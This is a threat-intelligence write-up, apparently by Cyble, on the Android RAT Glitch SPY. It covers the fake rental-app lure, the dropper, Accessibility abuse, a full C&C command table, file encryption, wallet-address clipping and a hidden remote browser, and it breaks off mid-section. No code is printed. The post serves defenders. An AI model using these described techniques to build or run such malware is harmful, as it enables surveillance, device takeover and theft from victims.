<p>The downloaded application functions as a dropper and installs the Glitch SPY payload after convincing the user to allow installation from unknown sources. Glitch SPY prompts the victim to enable Android Accessibility Service, which it abuses to automate permission grants, interact with the device UI, extract visible screen content, perform gestures, support remote input, and enable further post-infection activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY maintains a persistent WebSocket channel to its C&amp;C server and supports over 70 commands spanning live screen streaming and remote control, screenshot and screen-reader capture, SMS, contact, call log, and location theft, camera and microphone surveillance, keylogging, file management, and shell execution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Beyond standard surveillance, it includes a crypto-clipper that swaps copied wallet addresses across multiple blockchain formats, file encryption/decryption routines, device-unlock and credential-capture logic, and a hidden remote-browser capability that lets attackers conduct web-based account takeover from the victim's own device and IP.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder module lets operators set a custom app name, package ID, icon, and decoy URL per payload, indicating the platform is designed for redistribution across multiple campaigns, not a single targeted operation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121430,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-1-%E2%80%93-Glitch-SPY-Attack-Chain-1024x601.png" alt="Figure 1 – Glitch SPY Attack Chain" class="wp-image-121430"><figcaption class="wp-element-caption"><em>Figure 1 – Glitch SPY Attack Chain</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Glitch SPY is an emerging Android RAT/builder platform identified through branding observed on an exposed C&amp;C admin panel.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware is distributed via a fake Polish rental app website that encourages users to download and install an APK outside official app stores.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The downloaded application is the Brokewell Android Loader, which acts as a dropper and deploys the Glitch SPY payload.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY heavily abuses the Android Accessibility Service to auto-grant permissions, extract on-screen content, perform taps and gestures, and operate the device with minimal user interaction.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY supports extensive surveillance and theft capabilities, including screen streaming, screenshots, keylogging, SMS theft, contact and call log collection, file access, audio and camera capture, clipboard monitoring, location tracking, and remote browser control.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware includes a crypto-clipper that swaps copied wallet addresses across multiple formats (ETH/EVM, TRON, Bitcoin legacy, and Bech32) with attacker-controlled addresses, directly targeting cryptocurrency users.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The exposed Glitch SPY panel confirms the presence of modules such as Agents, Viewer, Builder, Cryptor, Dropper, Settings, and Payloads.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The Builder module indicates that threat actors can generate customized Android payloads with configurable names, package IDs, icons, feature modules, decoy WebView URLs, and optional Telegram alerting.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/resources/research-reports/">Cyble Research and Intelligence Labs</a> identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, based on branding observed on an exposed command-and-control (C&amp;C) admin panel. The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> was distributed via the suspicious domain tutaj-dompl[.]com, which appears to be a Polish apartment and house rental platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The website advertises verified apartments, viewing reservations, direct contact with property owners, and a simplified rental process without broker commissions. Its primary objective is to encourage users to download an Android APK to reserve apartment viewings, check availability, save listings, and receive confirmation updates.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121434,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-2-Fake-Tutaj-Dom-distribution-website.png" alt="" class="wp-image-121434"><figcaption class="wp-element-caption"><em>Figure 2 - Fake Tutaj Dom distribution website</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The lure is socially plausible, as users searching for rental properties may install a dedicated application to secure viewing slots or communicate with property owners. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, particularly targeting users searching for rental properties in Poland.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once installed, the application displays the rental-themed website as a decoy interface, while the Glitch SPY payload runs in the background and initiates malicious activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis, the malware was observed communicating with the C&amp;C domain sportypointsrewards[.]com. Accessing the C&amp;C infrastructure revealed an admin login panel branded as Glitch SPY, which prompted for a username and password. We also identified an additional Glitch SPY admin panel URL gich[.]etherraffleexchange[.]us.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>However, no communicating APK associated with that second panel has been recovered at the time of analysis.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121437,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-3-Glitch-SPY-admin-login-panel.png" alt="" class="wp-image-121437"><figcaption class="wp-element-caption"><em>Figure 3 - Glitch SPY admin login panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Before authentication, the admin panel exposed a partial view of the Glitch SPY dashboard, revealing multiple modules, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121438,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-4-%E2%80%93-Glitch-SPY-dashboard.png" alt="Figure 4 – Glitch SPY dashboard" class="wp-image-121438"><figcaption class="wp-element-caption"><em>Figure 4 – Glitch SPY dashboard</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The <strong>Agents</strong> module appears to be designed to list infected devices and search for victims by name, agent ID, device details, or IP address.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Viewer</strong> module provides live screen viewing and remote-control operations, including remote input, pattern unlock, screen streaming, screenshots, screen-reader extraction, Android navigation controls, camera access, audio capture, keylogging, clipper operations, file management, SMS access, contacts, call logs, location tracking, installed applications, device accounts, system information, remote browser interaction, shell access, permission prompting, Device Admin control, biometric prompt suppression, app hiding, and self-uninstall functionality.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Builder</strong> module allows TA to configure and compile Android payloads using Gradle on the server. Configurable options include the application name, package name, launcher icon, version information, foreground notification text, decoy WebView URL, feature modules, Device Admin activation, and Telegram alert settings.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Cryptor</strong> module is present but marked as “Coming soon,” suggesting planned support for APK repacking, fresh signing, payload noise under assets, and mirror obfuscation layers while preserving installability.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Dropper</strong> module appears to allow TA to wrap a generated payload inside a separate dropper APK, supporting staged delivery.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Payloads</strong> module appears to store APKs generated by the Builder and Dropper modules.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once the user installs the downloaded application, it functions as a dropper and presents a fake update-style screen to guide the victim through the required installation and permission steps. The dropper first attempts to convince the user to allow installation from unknown sources. After this permission is granted, the Glitch SPY payload is installed on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY prompts the user to enable the Android Accessibility Service. Once Accessibility access is enabled, the malware abuses this capability to automate permission grants and continue its post-installation activity with minimal user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows Glitch SPY to obtain the permissions required for remote control, screen capture, keylogging, SMS theft, file access, camera and microphone surveillance, clipboard monitoring, and other intrusive operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A detailed technical analysis of these capabilities is provided in the following section.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The application downloaded from the fraudulent website was identified as the Brokewell Android Loader, based on its package naming pattern and its use of techniques designed to circumvent Android permission restrictions. CRIL first documented the Brokewell Android Loader and the Brokewell Banking Trojan in April 2024.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, the loader presents a fake update-themed screen and prompts the user to allow installation of applications from unknown sources. Once the user grants this permission, the loader installs the Glitch SPY payload on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121441,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-5-Glitch-SPY-installation-activity.png" alt="" class="wp-image-121441"><figcaption class="wp-element-caption"><em>Figure 5 - Glitch SPY installation activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Abuse of Android Accessibility Service</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following installation, Glitch SPY immediately attempts to obtain Android Accessibility Service access, which is required for several of its core capabilities. After the user enables the Accessibility Service, the malware abuses this permission to observe UI elements, interact with on-screen content, perform gestures, click buttons, extract visible text, and automate permission approval flows with limited user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware includes logic for remote tap and swipe actions, screen-reader text extraction, gesture dispatch, automated permission granting, keyguard interaction, PIN/password entry, pattern unlock assistance, biometric prompt handling, and force-stop or uninstall interruption. This makes Accessibility the primary mechanism Glitch SPY uses to support TA-driven control of the infected device and to continue post-installation activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Command and Control</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY starts its core C&amp;C service and establishes a persistent WebSocket-based communication channel with the command-and-control server. The malware Glitch SPY refers to the device as an agent, assigns an agent_id to the infected device, collects device metadata, and sends an initial hello message along with deviceInfo to register the infected device with the C&amp;C panel. The server responds with a hello_ack, after which the implant maintains connectivity using heartbeat and ping logic.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The implant executes the requested action locally and returns the output through response messages such as command_result, screen_frame, sms_data, contacts_data, file_list, and browser_command_result.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The complete list of commands is provided below.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Command</strong></td>
<td><strong>Feature</strong></td>
</tr>
<tr>
<td>request_screen_stream</td>
<td>Starts live screen streaming from the infected device to the C&amp;C panel.</td>
</tr>
<tr>
<td>stop_screen_stream</td>
<td>Stops the active screen-streaming session.</td>
</tr>
<tr>
<td>request_screenshot</td>
<td>Captures a screenshot of the infected device screen and returns it to the C&amp;C.</td>
</tr>
<tr>
<td>request_screen_reader_text</td>
<td>Uses Accessibility to extract visible on-screen text and send it to the C&amp;C Server.</td>
</tr>
<tr>
<td>request_sms</td>
<td>Collects SMS messages from the infected device.</td>
</tr>
<tr>
<td>send_sms</td>
<td>Sends an SMS message from the infected device using TA provided content.</td>
</tr>
<tr>
<td>request_contacts</td>
<td>Extracts the victim’s contact list.</td>
</tr>
<tr>
<td>request_call_log</td>
<td>Collects call history from the infected device.</td>
</tr>
<tr>
<td>request_location</td>
<td>Retrieves the device location.</td>
</tr>
<tr>
<td>request_app_list</td>
<td>Enumerates installed applications on the device.</td>
</tr>
<tr>
<td>request_device_accounts</td>
<td>Collects account information configured on the Android device.</td>
</tr>
<tr>
<td>request_system_info</td>
<td>Collects device metadata</td>
</tr>
<tr>
<td>request_file_list</td>
<td>Lists files and folders from a specified path on the device.</td>
</tr>
<tr>
<td>request_file_download</td>
<td>Downloads a selected file from the infected device to the C&amp;C.</td>
</tr>
<tr>
<td>request_folder_zip_download</td>
<td>Compresses a folder and prepares it for download</td>
</tr>
<tr>
<td>file_upload_start</td>
<td>Starts a file upload session.</td>
</tr>
<tr>
<td>file_upload_chunk</td>
<td>Transfers a chunk of a file being uploaded to the infected device.</td>
</tr>
<tr>
<td>file_upload_finish</td>
<td>Finalizes the file upload operation on the device.</td>
</tr>
<tr>
<td>file_upload_cancel</td>
<td>Cancels an active file upload session.</td>
</tr>
<tr>
<td>file_mkdir</td>
<td>Creates a new directory on the infected device.</td>
</tr>
<tr>
<td>file_rename</td>
<td>Renames a selected file or folder on the device.</td>
</tr>
<tr>
<td>file_run</td>
<td>Opens or executes a selected file on the infected device.</td>
</tr>
<tr>
<td>file_zip_here</td>
<td>Creates a ZIP archive next to the selected folder on the device.</td>
</tr>
<tr>
<td>file_crypto_lock</td>
<td>Encrypts a selected file, likely producing a .enc file and removing the original.</td>
</tr>
<tr>
<td>file_crypto_unlock</td>
<td>Decrypts a previously encrypted .enc file.</td>
</tr>
<tr>
<td>request_offline_keylog</td>
<td>Retrieves offline keylog data from the device.</td>
</tr>
<tr>
<td>start_keylogger</td>
<td>Starts keylogging</td>
</tr>
<tr>
<td>stop_keylogger</td>
<td>Stops the active keylogging module.</td>
</tr>
<tr>
<td>request_camera_stream</td>
<td>Starts camera streaming from the infected device.</td>
</tr>
<tr>
<td>stop_camera_stream</td>
<td>Stops the active camera stream.</td>
</tr>
<tr>
<td>start_audio</td>
<td>Starts audio capture from the infected device.</td>
</tr>
<tr>
<td>stop_audio</td>
<td>Stops audio capture.</td>
</tr>
<tr>
<td>start_clipboard_monitor</td>
<td>Starts monitoring the device clipboard.</td>
</tr>
<tr>
<td>stop_clipboard_monitor</td>
<td>Stops clipboard monitoring.</td>
</tr>
<tr>
<td>clipper_get_config</td>
<td>Retrieves the current crypto-clipper configuration from the device.</td>
</tr>
<tr>
<td>clipper_set_config</td>
<td>Pushes or updates clipper rules, likely including wallet replacement addresses.</td>
</tr>
<tr>
<td>clipper_inject_clipboard</td>
<td>Forces/injects clipboard content on the victim device.</td>
</tr>
<tr>
<td>execute_command</td>
<td>Executes a TA-provided shell command on the infected device.</td>
</tr>
<tr>
<td>remote_browser_start</td>
<td>Starts a remote browser session on the infected device.</td>
</tr>
<tr>
<td>remote_browser_stop</td>
<td>Stops the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_navigate</td>
<td>Navigates the remote browser to a supplied URL.</td>
</tr>
<tr>
<td>remote_browser_click</td>
<td>Performs a click action inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_text</td>
<td>Enter the TA-provided text into the remote browser.</td>
</tr>
<tr>
<td>remote_browser_swipe</td>
<td>Performs a swipe gesture inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_key</td>
<td>Sends keyboard key actions to the remote browser, such as Enter, Backspace, Tab, or arrow keys.</td>
</tr>
<tr>
<td>remote_browser_js_fill</td>
<td>Fills fields in the remote browser using JavaScript-style automation.</td>
</tr>
<tr>
<td>remote_browser_clear_field</td>
<td>Clears a selected input field in the remote browser.</td>
</tr>
<tr>
<td>remote_browser_action</td>
<td>Performs a generic browser-side action, likely used for submit, back, reload, or similar UI actions.</td>
</tr>
<tr>
<td>remote_browser_set_mode</td>
<td>Switches the remote browser view mode, such as desktop/mobile mode.</td>
</tr>
<tr>
<td>remote_browser_fps</td>
<td>Adjusts the remote browser streaming or update frame rate.</td>
</tr>
<tr>
<td>tap_ui_submit</td>
<td>Attempts to tap a visible submit/OK/Done button or sends Enter to submit the current UI.</td>
</tr>
<tr>
<td>pattern_fetch</td>
<td>Retrieves a stored Android unlock pattern from the malware/device-side store.</td>
</tr>
<tr>
<td>pattern_store</td>
<td>Saves a TA-provided Android unlock pattern for later reuse.</td>
</tr>
<tr>
<td>pattern_clear_store</td>
<td>Clears the saved unlock pattern from storage.</td>
</tr>
<tr>
<td>pattern_auto_unlock</td>
<td>Uses a saved or provided pattern to attempt automatic device unlock.</td>
</tr>
<tr>
<td>credential_fetch</td>
<td>Retrieves a stored PIN/password credential value or credential state.</td>
</tr>
<tr>
<td>credential_manual_save</td>
<td>Saves a PIN/password credential provided by the TA on the device side.</td>
</tr>
<tr>
<td>credential_manual_save_unlock</td>
<td>Saves a supplied credential and immediately attempts to unlock the device with it.</td>
</tr>
<tr>
<td>credential_auto_unlock</td>
<td>Attempts to unlock the device automatically using a previously captured or saved credential.</td>
</tr>
<tr>
<td>credential_clear</td>
<td>Clears the stored PIN/password credentials from the malware’s storage.</td>
</tr>
<tr>
<td>prompt_permission_notifications</td>
<td>Opens or triggers the Android notification permission flow.</td>
</tr>
<tr>
<td>prompt_permission_storage</td>
<td>Opens or triggers the storage permission flow.</td>
</tr>
<tr>
<td>prompt_permission_location</td>
<td>Opens or triggers the location permission flow.</td>
</tr>
<tr>
<td>prompt_permission_battery</td>
<td>Opens the battery optimization exemption flow.</td>
</tr>
<tr>
<td>prompt_permission_all_files</td>
<td>Opens the “All files access” permission screen.</td>
</tr>
<tr>
<td>activate_device_admin</td>
<td>Launches or triggers Device Admin activation for the malware.</td>
</tr>
<tr>
<td>deactivate_device_admin</td>
<td>Attempts to remove Device Admin rights from the malware.</td>
</tr>
<tr>
<td>block_biometric</td>
<td>Enables/disables biometric prompt suppression to force PIN/password fallback.</td>
</tr>
<tr>
<td>wake_screen</td>
<td>Wake the victim's device screen.</td>
</tr>
<tr>
<td>lock_device</td>
<td>Locks the device screen</td>
</tr>
<tr>
<td>hide_screen</td>
<td>Hides the visible device screen from the victim's side</td>
</tr>
<tr>
<td>hide_app</td>
<td>Hides the malware application icon or disables its launcher component.</td>
</tr>
<tr>
<td>show_app</td>
<td>Restores the malware application launcher component.</td>
</tr>
<tr>
<td>self_uninstall</td>
<td>Attempts to uninstall the malware from the device.</td>
</tr>
<tr>
<td>uninstall_app</td>
<td>Attempts to uninstall a specified application from the device.</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Capture and Live Streaming</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY can remotely view the victim’s screen and interact with the device in near real time.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the request_screen_stream command from the C&amp;C panel, the malware initiates its screen capture module and begins sending screen frames back to the server as screen_frame messages.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA’s panel includes options to control stream quality, FPS, and scale, indicating that the stream can be adjusted based on device state and network conditions.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121445,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-6-%E2%80%93-Screen-capture-Activity.png" alt="" class="wp-image-121445"><figcaption class="wp-element-caption"><em>Figure 6 – Screen capture Activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For a one-time capture, the TA can use request_screenshot, which instructs the malware to capture the device's screen and return the image to the C&amp;C. When visual streaming is unavailable or insufficient, the user can use request_screen_reader_text, which abuses the Android Accessibility Service to extract visible text from the active screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows the malware to collect sensitive information displayed in banking applications, <a href="https://cyble.com/knowledge-hub/top-secure-messaging-apps-encrypted-chats/">messaging apps</a>, OTP prompts, browser pages, and authentication screens.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In addition to visual monitoring, this capability supports hands-on fraud activity. By combining live screen streaming with Accessibility-based remote input, the TA can observe the victim’s device, understand the active application context, and perform follow-up actions such as tapping buttons, entering text, navigating screens, or capturing credentials.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>File Manager and File Encryption</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY includes a remote file manager that allows the TA to browse, retrieve, modify, and manipulate files on the infected device. When the TA sends request_file_list, the malware lists files and folders from the requested directory and returns the results to the C&amp;C as a file listing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the TA selects a file for exfiltration, the malware reads it and sends it back to the server. For folders, the malware compresses the selected directory before exfiltration, making it easier for the TA to retrieve multiple files.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY also includes file encryption and decryption functionality through the file_crypto_lock and file_crypto_unlock commands. When file_crypto_lock is issued, the malware encrypts the selected file using AES/GCM/NoPadding, creates an encrypted .enc version, and removes the original plaintext file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The encrypted file uses the FMENC1 header followed by cryptographic metadata and ciphertext. If standard deletion of the plaintext file fails, the malware uses a secure-delete routine that overwrites the file with random data, truncates it, syncs the file descriptor, and then attempts to delete it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121447,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-7-%E2%80%93-File-encryption-logic.png" alt="" class="wp-image-121447"><figcaption class="wp-element-caption"><em>Figure 7 – File encryption logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although file encryption could be abused for extortion, the analyzed sample does not confirm an automated mass-encryption routine, ransom note, payment workflow, or victim-facing ransom screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Crypto Clipper Functionality</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The crypto-clipper module is designed to monitor clipboard activity on the infected device and replace copied <a href="https://cyble.com/blog/cryptocurrency-firms-being-raided-by-cybercriminals/">cryptocurrency</a> wallet addresses with TA-configured addresses.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The module supports multiple wallet formats, including ETH/EVM addresses beginning with 0x, TRON/TRX addresses beginning with T, Bitcoin legacy addresses beginning with 1 or 3, and Bitcoin Bech32 addresses beginning with bc1q or bc1p. The code also includes URI-style prefixes such as bitcoin:, ethereum:, erc20:, tron:, bsc:, matic:, polygon:, arbitrum:, optimism:, base:, and ton:, indicating that the malware can detect wallet addresses copied in both plain-text and URI-prefixed formats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121453,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-8-%E2%80%93-Malware-implemented-crypto-wallet-address-pattern-match.png" alt="Figure 8 – Malware implemented crypto wallet address pattern match" class="wp-image-121453"><figcaption class="wp-element-caption"><em>Figure 8 – Malware implemented crypto wallet address pattern match</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the start_clipboard_monitor command, Glitch SPY begins tracking clipboard changes on the infected device. Before performing any replacement, the clipper module is enabled in the configuration.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If replacement is active, the malware reads the current clipboard content, extracts text from available clipboard items, removes null bytes and hidden formatting characters, normalizes whitespace, and attempts to identify a supported cryptocurrency wallet address.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If a valid wallet address is detected, Glitch SPY selects a configured replacement address from the same cryptocurrency family and ensures it is different from the victim-copied address. It then updates the clipboard using Android’s ClipboardManager.setPrimaryClip() API, replacing the victim’s original wallet address with the attacker-controlled value.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After the replacement, the malware reports the event to the C&amp;C server, including the original address, replacement address, and detected cryptocurrency type, such as ETH/EVM, TRX, or BTC.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121454,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-9-Crypto-clipper-clipboard-replacement-logic.png" alt="" class="wp-image-121454"><figcaption class="wp-element-caption"><em>Figure 9 - Crypto clipper clipboard replacement logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Browser Capability</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY’s remote browser capability allows the TA to open and control a browser session directly on the infected device. The malware receives a URL from the C&amp;C server and loads it inside a WebView on the victim’s device. It also supports switching between mobile and desktop browsing modes, allowing the TA to control how websites render during the session.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The browser session runs in a hidden off-screen window, keeping it active without alerting the victim. After the browser session is initialized, the malware reports the session status, loaded URL, browsing mode, and window details back to the C&amp;C server. This allows the TA to confirm that the browser session is active and ready for interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121455,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-10-Remote-browser-activity.png" alt="" class="wp-image-121455"><figcaption class="wp-element-caption"><em>Figure 10 - Remote browser activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA can further control the session using commands to navigate to URLs, click page elements, enter text, swipe through pages, send keyboard actions, and fill or clear web form fields.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
